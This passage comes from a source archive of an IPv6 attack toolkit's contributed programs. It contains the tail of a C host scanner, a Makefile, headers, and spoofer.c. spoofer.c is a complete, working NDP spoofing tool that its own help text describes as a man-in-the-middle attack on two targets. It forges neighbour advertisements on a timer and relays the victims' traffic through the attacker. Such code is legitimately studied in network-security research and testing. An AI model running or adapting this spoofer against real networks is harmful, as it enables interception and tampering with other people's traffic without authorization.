PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // encapsula o pacote thc_generate_pkt(interface, NULL, mac, pkt3, &pkt3_len); // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt3, &pkt3_len); } /** Função principal que realiza o host scan IPv6 na rede */ int hostScan(int rawmode, // informa se o "raw mode" foi ativado ou nao char *interface, // nome da interface de analise unsigned char *multicast6, // endereco do grupo multicast de destino unsigned char *router6, // roteador da rota parametrizada unsigned char **routers) { unsigned char *src6 = NULL, // endereco ip6 do host [que realiza o scan] *mac = NULL, // endereco MAC do host [que realiza o scan] string[64] = "ip6 and dst "; // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado] time_t passed; // timestamp do inicio do scan pcap_t *p; // contexto pcap de captura // obtendo seu proprio endereco ip6 src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL); // se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6)); exit(-1); } // setar o endereco do host para a filtragem de pacotes recebidos strcat(string, thc_string2notation(thc_ipv62string(src6))); // make the sending buffer unique memset(buf, 'A', sizeof(buf)); // Preenche o buffer com o caractere 'A' time((time_t *) & buf[2]); // coloca da 3a posicao do buffer o tempo em segundos [padrao] buf[10] = getpid() % 256; // coloca o valor do process id .. buf[11] = getpid() / 256; // .. nas posicoes 11 e 12 do buffer memcpy(&buf[12], multicast6, 4); // coloca o endereco de multicast na 13a posicao do buffer // inicializa a interface de captura de pacotes com o filtro criado if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } // Envio do 1o pacote : Echo Request Comum sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL); // Envio do 2o pacote : Echo Request Com falha de Opções sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac); // altera os dados do buffer ??? buf[0] = NXT_INVALID; buf[1] = 1; // Envio do 3o pacote : Echo Request Com dados Hop by Hop sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac); // ??? while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff)); // Anota o tempo de inicio passed = time(NULL); // enquanto nao se passam 5 segundos while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff)) thc_pcap_check(p, (char *) check_packets, NULL); // verifica os pacotes capturados // fecha a interface de captura thc_pcap_close(p); // informa o numero de hosts ativos encontrados //printf("Found %d systems alive\n", alive_no); printf("\n"); printAliveSystems(); } int main(int argc, char *argv[]) { unsigned char *router6 = NULL; // roteador da rota parametrizada unsigned char *multicast6, // endereco do grupo multicast de destino *routers[2]; int rawmode = 0; // informa se o "raw mode" foi ativado ou nao char *interface; // nome da interface de analise // verifica se foi pedida as instrucoes de uso if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); // verifica se foi selecionado para funcionar em "raw mode" if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } // nome da interface de captura interface = argv[1]; // pode ser informado um grupo multicast para se limitar o escopo do scan if (argv[2] != NULL && argc > 2) multicast6 = thc_resolve6(argv[2]); else // caso nao tenha sido informado eh utilizado o endereco de multicast[broadcast] padrao multicast6 = thc_resolve6("ff02::1"); // caso seja passado alguma rota , setar os roteadores if (argv[3] != NULL && argc > 3) { router6 = thc_resolve6(argv[3]); routers[0] = multicast6; routers[1] = NULL; multicast6 = router6; // switch destination and router } hostScan(rawmode, interface, multicast6, router6, routers); return 0; } thc-ipv6-2.5/contrib/Makefile0000644000000000000000000000065412256335477014641 0ustar rootrootPROGRAMS= host_scan spoofer CC=gcc #CFLAGS?=-Wall -ggdb CFLAGS?=-O2 LDFLAGS+=-lpcap -lssl -lcrypto -I.. PREFIX=/usr/local LIBS=../thc-ipv6-lib.o all: $(PROGRAMS) %: %.c $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) $(LIBS) clean: rm -f $(PROGRAMS) *~ core DEADJOE strip: all strip $(PROGRAMS) install: strip install -m0755 -d ${DESTDIR}${PREFIX}/bin install -m0755 $(PROGRAMS) ${DESTDIR}${PREFIX}/bin .PHONY: all install clean thc-ipv6-2.5/contrib/data_structures.h0000644000000000000000000000104412256335477016560 0ustar rootroot#ifndef DATA_STRUCTURES_H_ #define DATA_STRUCTURES_H_ typedef struct { char *interface; unsigned char *uniOrMultiCastAddr; //char *router; int rawMode; } HArgs; typedef struct { char *interface; unsigned char *ipAddr; int rawMode; unsigned char *ownIp; unsigned char *ownMac; } RArgs; typedef struct { char *interface; unsigned char *ipAddrVic1, *ipAddrVic2; unsigned char *macAddrVic1, *macAddrVic2; int twoVics; int rawMode; unsigned char *ownIp; unsigned char *ownMac; } MArgs; #endif /*DATA_STRUCTURES_H_ */ thc-ipv6-2.5/contrib/host_scan.h0000644000000000000000000000212712256335477015330 0ustar rootroot#ifndef HOST_SCAN_H_ #define HOST_SCAN_H_ #if defined (HOST_SCAN_C) #define HOST_SCAN_EXT #else #define HOST_SCAN_EXT extern #endif /** Função que realiza o envio de um pacote Echo Request para na interface especificada para o endereço de multicast passado como parâmetro. */ HOST_SCAN_EXT int sendEchoRequest(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac, // Endereço do host de destino [MAC] unsigned char *macsrc); // Endereço do host q send o pacote [MAC] #undef HOST_SCAN_EXT #endif thc-ipv6-2.5/contrib/spoofer.c0000644000000000000000000002631512256335477015024 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include "host_scan.h" #define SPOOFER_C_ #include "spoofer.h" #undef SPOOFER_C_ #define DEBUG 0 #define TIMER_TO_SPOOF 55 //in seconds, the normal cache is set to 60 seconds #define ETH_HDR_LEN 14 // Extensão do cabeçalho Ethernet #define IP6_HDR_LEN 40 // Extensão do cabeçalho IPv6 #define BUF_SIZE 16 // Extensão do Buffer de Envio #define PKT_FLAGS 0xdeadbeef // Flags de envio do pacote [ID|SEQ] extern int thc_socket; extern char *default_interface; int pidRepeater1 = 0; //process id to send the kill signal int pidInfector1 = 0; //process id to send the kill signal int pidInfector2 = 0; //process id to send the kill signal MArgs mArgs; unsigned char *pkt = NULL, buf[24], mac[7] = ""; unsigned char fakemac[7] = "\x00\x0c\x29\x01\x75\xfe" /*"\x00\xfa\b5\x00\x44\xd5", */ ; unsigned char targetmac[7] = /*"\x00\x0c\x29\xf2\x44\xd5"; */ "\x00\x0c\x29\x0e\x09\x7a"; unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6; int pkt_len = 0; thc_ipv6_hdr *ipv6; char *interface; int rawmode = 0; int mychecksum; unsigned char *nodeAIp, *nodeAMac, *nodeBIp, *nodeBMac, *ownMac; int createRepeater(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac); unsigned char *resolveMAC(unsigned char *maco) { unsigned char *mac = malloc(6); sscanf(maco, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); return mac; } /** * Own packet sending function * */ int daemon6_send_pkt(char *interface, unsigned char *pkt, int *pkt_len) { struct sockaddr sa; thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; if (pkt == NULL || hdr->pkt == NULL || hdr->pkt_len < 1) return -1; if (interface == NULL) interface = default_interface; strcpy(sa.sa_data, interface); if (thc_socket < 0) thc_socket = thc_open_ipv6(); return sendto(thc_socket, pkt, *pkt_len, /*hdr->pkt, hdr->pkt_len, */ 0, &sa, sizeof(sa)); } /** Função que realiza o envio de um pacote Echo Request para na interface especificada para o endereço de multicast passado como parâmetro. */ int sendEchoRequest(char *interface, // Interface inde se sendrá o pacote unsigned char *multicast6, // Enedereço de Multicast IPv6 [destino] unsigned char *src6, // Enedereço do host que send o pacote [IPv6] unsigned char *router6, // Roteador [NULL caso não necessite] unsigned char **routers, // Lista de Roteamento unsigned char *buf, // Buffer contendo os dados a serem senddos unsigned char *mac, // Endereço do destino [MAC] unsigned char *macsrc) { //Endereco do host que send o pacote [MAC] int pkt1_len = 0; // Tamanho do pacote a ser senddo unsigned char *pkt1 = NULL; // Pacote a ser montado e senddo thc_ipv6_hdr *hdr; // Estrutura do header IPv6 // cria o 1o pacote para o endereco de multicast if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; // caso tenha sido setado uma rota e adicionado um header de rota if (router6 != NULL) if (thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0) return -1; // eh criado o pacote echo request if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_PINGREQUEST, 0, PKT_FLAGS, (unsigned char *) &buf, BUF_SIZE, 0) < 0) return -1; // aqui o pacote eh encapsulado if (thc_generate_pkt(interface, macsrc, mac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } // se for para uma rota send como fragmento ?? if (router6 != NULL) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, multicast6, NXT_ROUTE, hdr->pkt + IP6_HDR_LEN + ETH_HDR_LEN, hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN, hdr->pkt_len > 1448 ? 1448 : (((hdr->pkt_len - IP6_HDR_LEN - ETH_HDR_LEN) / 16) + 1) * 8); } else // senao send o pacote normalmente thc_send_pkt(interface, pkt1, &pkt1_len); } /** * This function sends the packets to poison the victim, it is the way to win the race condition, if the host`s ndp * cache is statefull * */ void sendPoison() { thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp); usleep(100); thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp); usleep(200); thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp); usleep(300); thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp); usleep(400); thc_neighboradv6(mArgs.interface, nodeBIp, nodeAIp, resolveMAC(mArgs.ownMac), nodeAMac, 0x60000000, nodeBIp); } /** * This function sends the packets to heal the victim, it is the way to clean the infection * * */ void sendVaccine(unsigned char *ipA, unsigned char *ipB, unsigned char *macA, unsigned char *macB) { sendEchoRequest(mArgs.interface, ipA, ipB, NULL, NULL, NULL, macA, macB); thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB); usleep(100); thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB); usleep(200); thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB); usleep(300); thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB); usleep(400); thc_neighboradv6(mArgs.interface, ipB, ipA, macB, macA, 0x60000000, ipB); } void alarmed() { sendPoison(); alarm(TIMER_TO_SPOOF); } int maintainInfection(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac) { int pid = 0; if ((pid = fork()) == 0) { nodeAIp = thc_resolve6(nodAIp); nodeAMac = resolveMAC(nodAMac); nodeBIp = thc_resolve6(nodBIp); nodeBMac = resolveMAC(nodBMac); if (DEBUG) puts("Infectuous process!"); signal(SIGALRM, alarmed); //sends an echo request in order to induce a neigh solicitation sendEchoRequest(mArgs.interface, nodeAIp, nodeBIp, NULL, NULL, NULL, nodeAMac, resolveMAC(mArgs.ownMac)); alarmed(); while (1) sleep(1); //to keep the process alive exit(0); // never reached } return pid; } void end() { printf("Healing - %d %d %d\n", pidInfector1, pidInfector2, pidRepeater1); kill(pidInfector1, SIGKILL); kill(pidInfector2, SIGKILL); kill(pidRepeater1, SIGKILL); sleep(20); printf("Healing\n"); sendVaccine(thc_resolve6(mArgs.ipAddrVic1), thc_resolve6(mArgs.ipAddrVic2), resolveMAC(mArgs.macAddrVic1), resolveMAC(mArgs.macAddrVic2)); sendVaccine(thc_resolve6(mArgs.ipAddrVic2), thc_resolve6(mArgs.ipAddrVic1), resolveMAC(mArgs.macAddrVic2), resolveMAC(mArgs.macAddrVic1)); exit(0); } void spoofer(MArgs mArgss) { mArgs = mArgss; nodeAIp = thc_resolve6(mArgs.ipAddrVic1); nodeAMac = resolveMAC(mArgs.macAddrVic1); nodeBIp = thc_resolve6(mArgs.ipAddrVic2); nodeBMac = resolveMAC(mArgs.macAddrVic2); //Decides if it is a 1 side spoof or a 2 side spoof if (mArgs.twoVics) { pidInfector1 = maintainInfection(mArgs.ipAddrVic1, mArgs.macAddrVic1, mArgs.ipAddrVic2, mArgs.macAddrVic2); //maintain the spoofer to A side pidInfector2 = maintainInfection(mArgs.ipAddrVic2, mArgs.macAddrVic2, mArgs.ipAddrVic1, mArgs.macAddrVic1); //maintain the spoofer to B side sleep(1); pidRepeater1 = createRepeater(mArgs.ipAddrVic1, mArgs.macAddrVic1, mArgs.ipAddrVic2, mArgs.macAddrVic2); signal(SIGTERM, end); //sets the function to be called when the program ends while (1); } else { puts("1"); } puts("---"); } void repeater(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int pkt_len = header->caplen; unsigned char *pkt = NULL; int erro = 0; if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV)) { return; } if (memcmp(data, ownMac, 6)) { return; } pkt = malloc(header->caplen); memcpy(pkt, data, header->caplen); if (DEBUG) thc_dump_data(pkt, pkt_len, "CAPTURED PACKET:"); if (memcmp(data + 6, nodeAMac, 6) == 0) { memcpy(pkt, nodeBMac, 6); //changing the destination } if (memcmp(data + 6, nodeBMac, 6) == 0) { memcpy(pkt, nodeAMac, 6); //changing the destination } memcpy(pkt + 6, ownMac, 6); //changing the source if (DEBUG) printf(" < %d >\n", pkt_len); if (DEBUG) thc_dump_data(pkt, pkt_len, "SPOOFED PACKET:"); clearerr(stderr); if ((erro = daemon6_send_pkt(interface, pkt, &pkt_len)) < 0) perror("No success"); if (DEBUG) printf("errono = %d\n", erro); } int createRepeater(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac) { ownMac = resolveMAC(mArgs.ownMac); if (DEBUG) thc_dump_data(ownMac, 6, "Own mac:"); nodeAIp = thc_resolve6(nodAIp); nodeAMac = resolveMAC(nodAMac); nodeBIp = thc_resolve6(nodBIp); nodeBMac = resolveMAC(nodBMac); int pid = 0; char filter[256] = "ip6 and ( ( src "; strcat(filter, nodAIp); strcat(filter, " and dst "); strcat(filter, nodBIp); strcat(filter, " ) or ( src "); strcat(filter, nodBIp); strcat(filter, " and dst "); strcat(filter, nodAIp); strcat(filter, " ) )"); if (DEBUG) printf("Filter : %s \n", filter); if ((pid = fork()) == 0) { thc_pcap_function(mArgs.interface, filter, (char *) repeater, 1, NULL); exit(0); } return pid; } int main(int argc, char *argv[]) { if (argc < 4) { printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\nCode based on thc-ipv6\n\n"); printf("Syntax: %s interface target1 target2\n\n", argv[0]); printf("NDP spoof between target1 and target2 to perform a man-in-the-middle attack.\n"); exit(-1); } memset((char*)&mArgs, 0, sizeof(mArgs)); mArgs.interface = argv[1]; mArgs.ipAddrVic1 = thc_resolve6(argv[2]); mArgs.macAddrVic1 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic1); mArgs.ownMac = thc_get_own_mac(argv[1]); mArgs.ownIp = thc_get_own_ipv6(argv[1], mArgs.ipAddrVic1, PREFER_LINK); mArgs.twoVics = 1; mArgs.ipAddrVic2 = thc_resolve6(argv[3]); mArgs.macAddrVic2 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic2); if (mArgs.ownIp == NULL) { fprintf(stderr, "ERROR: Invalid interface: %s\n", argv[1]); exit(-1); } if (mArgs.macAddrVic1 == NULL) { fprintf(stderr, "ERROR: Invalid target1: %s\n", argv[2]); exit(-1); } if (mArgs.macAddrVic2 == NULL) { fprintf(stderr, "ERROR: Invalid target2: %s\n", argv[3]); exit(-1); } spoofer(mArgs); printf("\nPress Control-C to end MITM spoofing...\n"); while(1) sleep(1); }